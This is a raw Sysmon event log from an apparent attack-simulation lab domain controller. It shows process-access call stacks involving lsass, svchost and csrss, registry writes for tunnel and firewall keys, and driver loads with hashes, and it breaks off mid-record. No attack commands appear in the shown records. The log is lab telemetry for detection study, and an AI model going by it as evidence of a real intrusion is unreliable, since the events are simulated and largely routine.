13:53:45.226{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8569-5FCF-7F00-000000009101}2560C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002712Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.226{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8569-5FCF-7F00-000000009101}2560C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002711Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.226{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8569-5FCF-7F00-000000009101}2560C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002710Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.210{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002709Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.210{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002708Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.210{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002707Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.210{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002706Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.210{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002705Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.210{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002704Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.210{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002703Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002702Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002701Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002700Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.195{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000002699Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.195{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000002) 13241300x80000000000000002698Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.195{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\1SWD\IP_TUNNEL_VBUS\Teredo_Tunnel_Device 644600x80000000000000002697Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:01.571C:\Windows\System32\drivers\xeniface.sysMD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9AtrueAmazon Web Services, Inc.Valid 10341000x80000000000000002696Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.179{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002695Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.179{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002694Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.179{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002693Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.179{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002692Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.179{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002691Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.179{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002690Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.179{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 644600x80000000000000002689Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:01.571C:\Windows\System32\drivers\xenvif.sysMD5=E7C0450691E0B3D00FC15E823FFEB779,SHA256=5C0755A4E1F4FFD7B4A442CF5E3A8CF7F0C69B1CAA2B11C67596D77E166CA419,IMPHASH=C119D28B8420C26CE25D996F6D25FD88trueAmazon Web Services, Inc.Valid 10341000x80000000000000002688Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.163{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002687Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.163{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002686Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.148{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000002843Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:46.742{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000354) 22542200x80000000000000002842Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 